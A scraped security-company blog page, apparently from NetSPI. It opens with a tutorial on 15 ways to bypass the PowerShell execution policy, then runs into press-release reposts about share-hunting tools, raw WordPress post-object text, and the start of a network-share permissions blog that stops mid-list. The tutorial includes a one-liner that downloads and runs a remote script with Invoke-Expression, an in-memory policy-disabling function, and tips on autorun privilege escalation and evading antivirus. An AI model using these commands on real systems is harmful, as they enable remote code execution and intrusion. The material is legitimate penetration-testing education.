The PowerShell execution policy is the setting that determines which types of PowerShell scripts (if any) can be run on the system. By default it is set to "Restricted", which basically means none. However, it's important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That's why there are so many options for working around it, including a few that Microsoft has provided. For more information on the execution policy settings and other default security controls in PowerShell, I suggest reading Carlos Perez's blog, which provides a nice overview.

Why Would I Want to Bypass the Execution Policy?

Automation seems to be one of the more common responses I hear from people, but below are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:

- Native to Windows

- Able to call the Windows API

- Able to run commands without writing to the disk

- Able to avoid detection by antivirus

- Already flagged as "trusted" by most application whitelisting solutions

- A medium used to write many open source pentest toolkits

How to View the Execution Policy



Before being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the "Restricted" execution policy. You can take a look at the current configuration with the "Get-ExecutionPolicy" PowerShell command. If you're looking at the setting for the first time, it's likely set to "Restricted" as shown below.

PS C:\> Get-ExecutionPolicy

It's also worth noting that the execution policy can be set at different levels (scopes) on the system. To view a list of them, use the command below. For more information, see Microsoft's "Set-ExecutionPolicy" documentation.

Get-ExecutionPolicy -List | Format-Table -AutoSize
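To make the scope list easier to reason about, here is a minimal Python sketch of how the effective policy falls out of the per-scope values. It assumes the documented precedence order (MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine) and falls back to "Restricted" when every scope is "Undefined", which matches the default described above for a Windows client. The function name and the sample dictionaries are hypothetical and only illustrate the lookup.

```python
# Scope precedence, highest priority first (assumed from Microsoft's documentation).
SCOPE_PRECEDENCE = ["MachinePolicy", "UserPolicy", "Process", "CurrentUser", "LocalMachine"]


def effective_policy(scopes, default="Restricted"):
    """Return the first policy that is not 'Undefined', walking scopes by precedence."""
    for scope in SCOPE_PRECEDENCE:
        value = scopes.get(scope, "Undefined")
        if value.lower() != "undefined":
            return value
    # Nothing is set anywhere, so the built-in default applies.
    return default


# Hypothetical sample data: a fresh install with nothing configured.
fresh_install = {scope: "Undefined" for scope in SCOPE_PRECEDENCE}
print(effective_policy(fresh_install))

# The current user sets their own policy; no admin rights are involved.
user_override = dict(fresh_install, CurrentUser="Unrestricted")
print(effective_policy(user_override))

# A value delivered through Group Policy sits above the user's setting.
gpo_locked = dict(user_override, MachinePolicy="AllSigned")
print(effective_policy(gpo_locked))
```

In this ordering the Process and CurrentUser scopes sit above LocalMachine, which is why several of the techniques below work without administrator rights, while a value set through Group Policy sits above both.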

Lab Setup Notes

In the examples below I will use a script named runme.ps1 that contains the following PowerShell command to write a message to the console:

Write-Host "My voice is my passport, verify me."

When I attempt to execute it on a system configured with the default execution policy, PowerShell refuses to load the file and reports that running scripts is disabled on this system.

If your current policy is too open and you want to make it more restrictive to test the techniques below, then run the command "Set-ExecutionPolicy Restricted" from an administrator PowerShell console. Ok - enough of my babbling - below are 15 ways to bypass the PowerShell execution policy restrictions.

Bypassing the PowerShell Execution Policy

1. Paste the Script into an Interactive PowerShell Console

Copy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that you will be limited by your current user's privileges. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.

2. Echo the Script and Pipe it to PowerShell Standard In

Simply ECHO your script into PowerShell standard input. This technique does not result in a configuration change or require writing to disk.

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -

3. Read Script from a File and Pipe to PowerShell Standard In

Use the Windows "type" command or PowerShell "Get-Content" command to read your script from the disk and pipe it into PowerShell standard input. This technique does not result in a configuration change, but does require writing your script to disk. However, you could read it from a network share if you're trying to avoid writing to the disk.

Example 1: Get-Content PowerShell command

Get-Content .\runme.ps1 | PowerShell.exe -noprofile -

Example 2: Type command

TYPE .\runme.ps1 | PowerShell.exe -noprofile -



4. Download Script from URL and Execute with Invoke Expression

This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn't result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5. Use the Command Switch

This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console. It's nice for simple script execution, but more complex scripts usually end up with parsing errors. This technique does not result in a configuration change or require writing to disk.

Example 1: Full command

Powershell -command "Write-Host 'My voice is my passport, verify me.'"

Example 2: Short command

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

It may also be worth noting that you can place these types of PowerShell commands into batch files and place them into autorun locations (like the all users startup folder) to help during privilege escalation.

6. Use the EncodedCommand Switch

This is very similar to the "Command" switch, but all scripts are provided as a Base64-encoded Unicode (UTF-16LE) string. Encoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the "Command" switch. This technique does not result in a configuration change or require writing to disk. The sample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long.

Example 1: Full command

$command = "Write-Host 'My voice is my passport, verify me.'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand

Example 2: Short command using encoded string

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
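For readers preparing the encoded string on a non-Windows host, the same encoding can be reproduced outside PowerShell. The sketch below is a minimal Python equivalent, assuming only that the switch expects the command as UTF-16LE bytes (what .NET calls "Unicode") wrapped in Base64; the helper names are hypothetical.

```python
import base64


def encode_command(command):
    """Encode a command as UTF-16LE bytes, then Base64, for use with -EncodedCommand."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_command(encoded):
    """Reverse the encoding, which is handy for inspecting an encoded one-liner."""
    return base64.b64decode(encoded).decode("utf-16-le")


command = "Write-Host 'My voice is my passport, verify me.'"
encoded = encode_command(command)

# Print the full one-liner, then decode it again as a sanity check.
print("powershell.exe -EncodedCommand " + encoded)
print(decode_command(encoded))
```

The decoder is also useful on the defensive side, since encoded commands found in logs can be reversed the same way.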



7. Use the Invoke-Command Command

This is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive PowerShell console or one liner using the “Command” switch, but the cool thing is that it can be used to execute commands against remote systems where PowerShell remoting has been enabled. This technique does not result in a configuration change or require writing to disk.

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}

Based on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote computer and apply it to the local computer.

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. Use the Invoke-Expression Command

This is another one that's typically executed through an interactive PowerShell console or one liner using the "Command" switch. This technique does not result in a configuration change or require writing to disk. Below I've listed a few common ways to use Invoke-Expression to bypass the execution policy.

Example 1: Full command using Get-Content

Get-Content .\runme.ps1 | Invoke-Expression

Example 2: Short command using Get-Content

GC .\runme.ps1 | iex

9. Use the "Bypass" Execution Policy Flag

This is a nice flag added by Microsoft that will bypass the execution policy when you're executing scripts from a file. When this flag is used Microsoft states that "Nothing is blocked and there are no warnings or prompts". This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

10. Use the "Unrestricted" Execution Policy Flag

This is similar to the "Bypass" flag. However, when this flag is used Microsoft states that it "Loads all configuration files and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted for permission before it runs." This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy UnRestricted -File .\runme.ps1

11. Use the "RemoteSigned" Execution Policy Flag

Create your script, then follow the tutorial written by Carlos Perez to sign it. Finally, run it using the command below:

PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

This is one of the more creative approaches. The function below can be executed via an interactive PowerShell console or by using the "Command" switch. Once the function is called, it swaps out the session's "AuthorizationManager" for a new default instance. As a result, the execution policy is essentially set to unrestricted for the remainder of the session. This technique does not result in a persistent configuration change or require writing to disk; the change only lasts for the duration of the session.

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}

Disable-ExecutionPolicy; .\runme.ps1

13. Set the ExecutionPolicy for the Process Scope

As we saw in the introduction, the execution policy can be applied at many levels. This includes the process, which you have control over. Using this technique, the execution policy can be set to "Bypass" for the duration of your session. Also, it does not result in a persistent configuration change or require writing to the disk.

Set-ExecutionPolicy Bypass -Scope Process

14. Set the ExecutionPolicy for the CurrentUser Scope via Command

This option is similar to the process scope, but applies the setting to the current user's environment persistently by modifying a registry key. Unlike the process scope, this is a lasting configuration change, but it does not require writing a script to the disk.

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted



15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry

In this example I've shown how to change the execution policy for the current user's environment persistently by modifying a registry key directly.

HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
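The key above stores the policy as a string value. As a minimal sketch, assuming the value is named ExecutionPolicy (type REG_SZ), which is where "Set-ExecutionPolicy -Scope CurrentUser" keeps it, the change could be scripted with Python's standard winreg module. The helper names are hypothetical, and the registry write only runs on Windows.

```python
import sys

# Path under HKEY_CURRENT_USER, taken from the key shown above.
KEY_PATH = r"Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell"
VALUE_NAME = "ExecutionPolicy"  # assumed value name (REG_SZ)
VALID_POLICIES = ("Restricted", "AllSigned", "RemoteSigned", "Unrestricted", "Bypass")


def normalize_policy(name):
    """Return the canonical spelling of a policy name, or raise ValueError."""
    for policy in VALID_POLICIES:
        if policy.lower() == name.lower():
            return policy
    raise ValueError("unknown execution policy: " + name)


def set_current_user_policy(name):
    """Write the policy for the current user; needs no administrator rights."""
    import winreg  # only available on Windows

    policy = normalize_policy(name)
    with winreg.CreateKey(winreg.HKEY_CURRENT_USER, KEY_PATH) as key:
        winreg.SetValueEx(key, VALUE_NAME, 0, winreg.REG_SZ, policy)
    return policy


if __name__ == "__main__" and sys.platform == "win32":
    print(set_current_user_policy("unrestricted"))
```

Running "Get-ExecutionPolicy -List" afterwards should show the new value in the CurrentUser row.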

Wrap Up Summary

I think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins, or penetration testers. Microsoft never intended it to be a security control, which is why there are so many options for bypassing it. Microsoft was nice enough to provide some native options and the security community has also come up with some really fun tricks. Thanks to all of those people who have contributed through blogs and presentations. To the rest, good luck in all your PowerShell adventures and don't forget to hack responsibly. ;)

Looking for a strategic partner to critically test your Windows systems? Explore NetSPI’s network penetration testing services.

References

- https://obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html

- https://technet.microsoft.com/en-us/library/hh849694.aspx

- https://technet.microsoft.com/en-us/library/hh849812.aspx

- https://technet.microsoft.com/en-us/library/hh849893.aspx

- https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html

- https://www.hanselman.com/blog/SigningPowerShellScripts.aspx

- https://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html

On November 29, NetSPI VPs of Research Scott Sutherland and Nick Landers were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. Read the preview below or view it online.

+++

What will the New Year bring in cyberspace? Here's a roundup of some of the top security industry forecasts, trends and cybersecurity predictions for 2023. Where do things go from here?

Read on as 18 industry leaders in the security space come together to provide their insights into how the cybersecurity industry will shake out in 2023.

NetSPI: Scott Sutherland, VP of Research - Can DLT Help Stop Software Supply Chain Attacks?

"Adoption of distributed ledger technology (DLT) is still in its infancy and we'll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DLT can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several "supply chain compromises" that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying third-party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem."

+++

NetSPI: Nick Landers, VP of Research - By the end of next year every major financial institution will have announced adoption of Blockchain technology

"There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven't already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was "secure by default", think again. Just like cloud platform adoption, the promises of "secure by default" will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech."

You can read the full article at VMblog!

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Dark Reading article called New Open Source Tools Launched for Adversary Simulation. Read the preview below or view it online.

+++











Network shares in Active Directory environments configured with excessive permissions pose serious risks to the enterprise in the form of data exposure, privilege escalation, and ransomware attacks. Two new open source adversary simulation tools, PowerHuntShares and PowerHunt, help enterprise defenders discover vulnerable network shares and manage the attack surface.

The tools will help defense, identity and access management (IAM), and security operations center (SOC) teams streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments, NetSPI's senior director Scott Sutherland wrote on the company blog. Sutherland developed these tools.

PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. The PowerHuntShares tool addresses the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.

"PowerHuntShares will inventory SMB share ACLs configured with 'excessive privileges' and highlight 'high risk' ACLs [access control lists]," Sutherland wrote.

PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. The tool automates the collection of artifacts at scale using PowerShell remoting and performs initial analysis.

You can read the full article at Dark Reading!

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Open Source For You article called New Open Source Tools From NetSPI Address Information Security Issues. Read the preview below or view it online.

+++

Two new open source solutions for identity and access management (IAM) and security operations centre (SOC) groups have been made available by NetSPI, a business that specialises in enterprise penetration testing and attack surface management. Information security teams will benefit from these tools, PowerHuntShares and PowerHunt, which will help them find weak network shares and enhance detections in general.

PowerHuntShares intends to lessen the problems created by excessive powers in corporate systems, such as data disclosure, privilege escalation, and ransomware assaults. On Active Directory domain-joined PCs, the programme detects, examines, and reports excessive share permissions linked to their respective SMB shares.

A modular threat hunting platform called PowerHunt finds dangers in a variety of target contexts as well as target-specific oddities and outliers. This detection is based on artefacts from popular MITRE ATT&CK techniques. The collection of these artefacts is automated using PowerShell remoting, and initial analysis is then performed. PowerHunt also creates simple-to-use .csv files for improved triage and analysis with other tools and procedures.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. Read the preview below or view it online.

+++

At Black Hat USA 2022, NetSPI has unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt.

These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.

- PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. This capability helps address the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.

- PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and performs initial analysis. It can also output easy-to-consume .csv files so that additional triage and analysis can be done using other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications article called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online.

+++

NetSPI, an enterprise penetration testing and attack surface management company, is releasing two new open-source tools for identity and access management (IAM) and security operations center (SOC) groups. These tools, PowerHuntShares and PowerHunt, will help information security teams discover vulnerable network shares and improve detections overall.

PowerHuntShares aims to alleviate the pains of data exposure, privilege escalation, and ransomware attacks in company systems caused by excessive privileges. The tool inventories, analyzes, and reports excessive share permissions associated with their respective SMB shares on Active Directory domain joined computers.

PowerHunt is a modular threat hunting framework that locates risks across target environments, as well as identifies target-specific anomalies and outliers. This detection is based on artifacts from prevalent MITRE ATT&CK techniques; PowerHunt automates their collection using PowerShell remoting and performs initial analysis. PowerHunt also produces easy-to-consume .csv files for further triage and analysis with other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

For more information, please visit https://www.netspi.com/.

On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. Read the preview below or view it online.

+++

Preventing and mitigating cyberattacks is a massive day-to-day (sometimes hour-to-hour) endeavor for enterprises. New, more advanced techniques are revealed constantly, especially with the rise in ransomware-as-a-service, crime syndicates and cybercrime commoditization. Likewise, statistics are seemingly endless, with a regular churn of new, updated reports and research studies revealing worsening conditions.

According to Fortune Business Insights, the worldwide information security market will reach roughly $376 billion in 2029. IBM research, meanwhile, found that the average cost of a data breach is $4.35 million.

The harsh truth is that many organizations are exposed due to common software, hardware or organizational process vulnerabilities — and 93% of all networks are open to breaches, according to another recent report.

Cybersecurity must therefore be a team effort, said Scott Sutherland, senior director at NetSPI, which specializes in enterprise penetration testing and attack-surface management.

New open-source discovery and remediation tools

The company today announced the release of two new open-source tools for the information security community: PowerHuntShares and PowerHunt. Sutherland is demoing both at Black Hat USA this week.

These new tools are aimed at helping defense, identity and access management (IAM) and security operations center (SOC) teams discover vulnerable network shares and improve detections, said Sutherland.

They have been developed — and released in an open-source capacity — to “help ensure our penetration testers and the IT community can more effectively identify and remediate excessive share permissions that are being abused by bad actors like ransomware groups,” said Sutherland.

He added, “They can be used as part of a regular quarterly cadence, but the hope is they’ll be a starting point for companies that lacked awareness around these issues before the tools were released.”

Vulnerabilities revealed (by the good guys)

The new PowerHuntShares capability inventories, analyzes and reports excessive privilege assigned to server message block (SMB) shares on Microsoft’s Active Directory (AD) domain-joined computers.

SMB allows applications on a computer to read and write to files and to request services from server programs in a computer network.

NetSPI’s new tool helps address risks of excessive share permissions in AD environments that can lead to data exposure, privilege escalation and ransomware attacks within enterprise environments, explained Sutherland.

“PowerHuntShares is focused on identifying shares configured with excessive permissions and providing data insight to understand how they are related to each other, when they were introduced into the environment, who owns them and how exploitable they are,” said Sutherland.

For instance, according to a recent study from cybersecurity company ExtraHop, SMB was the most prevalent protocol exposed in many industries: 34 out of 10,000 devices in financial services; seven out of 10,000 devices in healthcare; and five out of 10,000 devices in state, local and education (SLED).

You can read the full article at VentureBeat!

[post_title] => VentureBeat: NetSPI rolls out 2 new open-source pen-testing tools at Black Hat [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => venturebeat-new-open-source-pentesting-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:23 [post_modified_gmt] => 2023-01-23 21:10:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28193 [menu_order] => 233 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 28175 [post_author] => 17 [post_date] => 2022-08-09 08:00:00 [post_date_gmt] => 2022-08-09 13:00:00 [post_content] =>Introduction

In this blog, I’ll explain how to quickly inventory, exploit, and remediate network shares configured with excessive permissions at scale in Active Directory environments. Excessive share permissions represent a risk that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments. So, I’ll also be exploring why network shares configured with excessive permissions are still plaguing most environments after 20 years of mainstream vulnerability management and penetration testing.

Finally, I’ll share a new open-source tool called PowerHuntShares that can help streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments. This content is also available in a presentation format here. Or, if you’d like to hear me talk about this topic, check out our webinar, How to Evaluate Active Directory SMB Shares at Scale.

This should be interesting to people responsible for managing network share access in Active Directory environments (Identity and access management/IAM teams) and the red team/penetration testers tasked with exploiting that access.

TL;DR: We can leverage Active Directory to help create an inventory of systems and shares. Shares configured with excessive permissions can lead to remote code execution (RCE) in a variety of ways. Remediation efforts can be expedited through simple data grouping techniques, and malicious share scanning can be detected with a few common event IDs and a little correlation (always easier said than done).

Table of Contents:

The Problem(s)

Network Share Permissions Inheritance Blind Spots

Network Share Inventory

Network Share Exploitation

Network Share Remediation

Introducing PowerHuntShares

Wrap Up

The Problem(s)

If only it were just one problem. I don’t know a penetration tester who doesn’t have a war story involving unauthorized network share access. In the real world, that story typically ends with the deployment of ransomware and double extortion. That’s why it’s important we try to understand some of the root causes behind this issue. Below is a summary of the root causes that often lead to massive network share exposure in most Active Directory environments.

Broken Asset Management

Tracking live systems in enterprise environments is difficult, and tracking an ever-changing inventory of shares and their owners is even more difficult. Even if the Identity and Access Management (IAM) team finds a network share through discovery, that raises several questions:

- Who owns it?

- What applications or business processes does it support?

- Can we remove high-risk Access Control Entries (ACEs)?

- Can we remove the share altogether?

Most of those questions can be answered if you have a functioning Configuration Management Database (CMDB). Unfortunately, not everyone does.

Broken Vulnerability Management

Many vulnerability management programs were never built to identify network share configurations that provide unauthorized access to authenticated domain users. Much of their focus has been on identifying classic vulnerabilities (missing patches, weak passwords, and application issues) and prioritizing efforts around vulnerabilities that don’t require authentication, which is of course not all bad.

However, based on my observations, the industry has only taken a deep interest in the Active Directory ecosystem in the last five years. This seems to be largely due to increased exposure and awareness of Active Directory (AD) attacks, which depend heavily on configurations rather than missing patches.

I’m also not saying IAM teams haven’t been working hard to do their jobs, but in many cases, they get bogged down in what equates to group management and forget to (or don’t have time to) look at the actual assets that global/common groups have access to. That is a deep well, but today’s focus is on the network shares.

Penetration testers have always known shares are a risk, but implementing, managing, and evaluating least privilege in Active Directory environments is a non-trivial challenge. Even with increased interest in the security community, very few solutions can effectively inventory and evaluate share access for an entire Active Directory domain (or multiple domains).

Based on my experience, very few organizations perform authenticated vulnerability scans to begin with. Even those that do seem to lack findings for common excessive privileges and inherited permissions, as well as the distilled summary data that most IAM teams need to make good decisions about the environment. There has been an overreliance on those types of tools for a long time because many companies have the impression that they provide more coverage of network share permissions than they actually do.

In short, good asset inventory and attack surface management pave the way for better vulnerability management coverage – and many companies aren’t quite there yet.

Not Considering Segmentation Boundaries

Most large environments have host, network, and Active Directory domain boundaries that need to be considered when performing any type of authenticated scanning or agent deployment. Companies trying to accurately inventory and evaluate network shares often miss things because they do not consider the boundaries isolating their assets. Make sure to work within those boundaries when evaluating assets.

The Cloud is Here!

The cloud is here, and it supports all kinds of fantastic file storage mediums, but that doesn’t mean that on-premises network shares disappear. Companies need to make sure they are still looking backward as they continue to look forward regarding security controls on file shares. For many companies, it may be the better part of a decade before they can migrate the bulk of their file storage infrastructure into their favorite floating mass of condensed water vapor – you know, the cloud. 😜

Misunderstanding NTFS and Share Permissions

There are a lot of bad practices related to share permission management that have gotten absorbed into IT culture over the years simply because people don’t understand how they work. One of the biggest contributors to excessive share permissions is privilege inheritance through native nested group memberships. This issue is not limited to network shares either. We have been abusing the same privilege inheritance issues for over a decade to get access to SQL Server Instances. In the next sections, I’ll provide an overview of the issue and how it can be exploited in the context of network shares.

Network Share Permissions Inheritance Blind Spots

A network share is just a medium for making local files available to remote users on the network, but two sets of permissions control a remote user’s access to the shared files. To understand the privilege inheritance problem, it helps to do a quick refresher on how NTFS and share permissions work together on Windows systems. Let’s explore the basics.

NTFS Permissions

- Used to control access to the local NTFS file system

- Can affect local and remote users

Share Permissions

- Used to control access to shared files and folders

- Only affects remote users



In short, from a remote user perspective, network share permissions (remote) are reviewed first, then NTFS permissions (local) are reviewed second, but the most restrictive permission always wins regardless. Below is a simple example showing that John has Full Control permissions on the share, but only Read permissions on the associated local folder. Most restrictive wins, so John is only provided read access to the files made available remotely through the shared folder.
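The "most restrictive wins" rule can be sketched as a set intersection. This is a deliberately simplified model, not how Windows actually evaluates access: it ignores deny entries and group membership, and the right names and the `effective_remote_access` helper are made up for illustration.

```python
# Simplified model: a permission level is just a set of allowed actions.
# The action names below are illustrative, not real Windows access masks.
READ = frozenset({"read"})
CHANGE = frozenset({"read", "write", "delete"})
FULL_CONTROL = frozenset({"read", "write", "delete", "change_permissions"})


def effective_remote_access(share_rights, ntfs_rights):
    """Return the actions a remote user can actually perform.

    A remote request must be allowed by BOTH the share permissions and the
    NTFS permissions, so the effective access is the intersection of the two.
    """
    return frozenset(share_rights) & frozenset(ntfs_rights)


# John: Full Control on the share, but only Read on the local folder.
john = effective_remote_access(FULL_CONTROL, READ)
print(sorted(john))  # ['read']
```

The order of the two arguments does not matter in this model: Read on the share with Full Control on the folder produces the same read-only result.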

So those are the basics, and the big idea is that the most restrictive ACL wins. However, there are some nuances that have to do with local groups that inherit Domain Groups. To get our heads around that, let’s touch briefly on the affected local groups.



Everyone

The Everyone group provides all authenticated and anonymous users with access in most configurations. This group is overused in many environments and often results in excessive privilege.

Builtin\Users

New local users are added to it by default. When the system is not joined to a domain, it operates as you would expect it to.

Authenticated Users

This group is nested in the Builtin\Users group. When a system is not joined to the domain, it doesn’t do much in the way of influencing access. However, when a system is joined to an Active Directory domain, Authenticated Users implicitly includes the “Domain Users” and “Domain Computers” groups. For example, an IT administrator may think they’re only providing remote share access to the Builtin\Users group, when in fact they are giving it to everyone on the domain. Below is a diagram to help illustrate this scenario.
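To make the nesting concrete, here is a minimal sketch that models group relationships as a dictionary and expands them recursively. The `CORP` domain, the `localuser1` account, and the `expand` helper are hypothetical. The "implicit" inclusion of domain groups is modeled as ordinary nesting purely for illustration; nothing here queries a real system.

```python
# Hypothetical group nesting on a standalone (non-domain-joined) machine.
STANDALONE = {
    r"BUILTIN\Users": {r"NT AUTHORITY\Authenticated Users", "localuser1"},
    r"NT AUTHORITY\Authenticated Users": set(),
}

# Same machine after joining the hypothetical CORP domain: Authenticated
# Users now effectively covers the domain's users and computers.
DOMAIN_JOINED = {
    r"BUILTIN\Users": {r"NT AUTHORITY\Authenticated Users", "localuser1"},
    r"NT AUTHORITY\Authenticated Users": {
        r"CORP\Domain Users",
        r"CORP\Domain Computers",
    },
}


def expand(group, nesting, seen=None):
    """Return every principal reachable from `group` through nesting."""
    seen = set() if seen is None else seen
    for member in nesting.get(group, ()):
        if member not in seen:
            seen.add(member)
            expand(member, nesting, seen)
    return seen


# Who really gets access when a share ACL grants BUILTIN\Users?
for label, nesting in (("standalone", STANDALONE), ("domain-joined", DOMAIN_JOINED)):
    print(label, sorted(expand(r"BUILTIN\Users", nesting)))
```

In the domain-joined case the expansion includes `CORP\Domain Users` and `CORP\Domain Computers`, which is the blind spot described above.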

The lesson here is that a small misunderstanding around local and domain group relationships can lead to unauthorized access and potential risk. The next section will cover how to inventory shares and their Access-Control Lists (ACLs) so we can target and remediate them.

Network Share Inventory

As it turns out, getting a quick inventory of your domain computers and associated shares isn’t that hard thanks to several native and open-source tools. The trick is to grab enough information to answer those who, what, where, when, and how questions needed for remediation efforts.
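As a rough sketch of what "enough information" might look like, the record below holds one access control entry per row, with fields loosely mapped to the who/what/where/when/how questions. The field names, the sample data, and the `is_excessive` check are assumptions made for illustration, not the output format of any particular tool.

```python
from dataclasses import dataclass
from datetime import date

# Broad groups discussed above; matching on these names is an assumption
# about what counts as "excessive" in a given environment.
HIGH_RISK_GROUPS = {
    "everyone",
    "users",  # BUILTIN\Users
    "authenticated users",
    "domain users",
    "domain computers",
}


@dataclass(frozen=True)
class ShareAce:
    computer: str    # where: host exposing the share
    share_name: str  # what: the share itself
    owner: str       # who: owner to contact about remediation
    created: date    # when: folder creation date
    identity: str    # who: principal the ACE grants access to
    rights: str      # how: level of access granted


def is_excessive(ace):
    """Flag ACEs granted to broad groups, ignoring any DOMAIN\\ prefix."""
    return ace.identity.split("\\")[-1].lower() in HIGH_RISK_GROUPS


inventory = [
    ShareAce("FILE01", "Finance", r"CORP\jsmith", date(2015, 3, 2),
             r"BUILTIN\Users", "FullControl"),
    ShareAce("FILE01", "Finance", r"CORP\jsmith", date(2015, 3, 2),
             r"CORP\Finance Team", "Modify"),
]
flagged = [ace for ace in inventory if is_excessive(ace)]
print([(ace.computer, ace.share_name, ace.identity) for ace in flagged])
```

Keeping one row per ACE rather than one row per share makes later grouping by owner, creation date, or share name straightforward.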

The discovery of shares and permissions boils down to a few basic steps: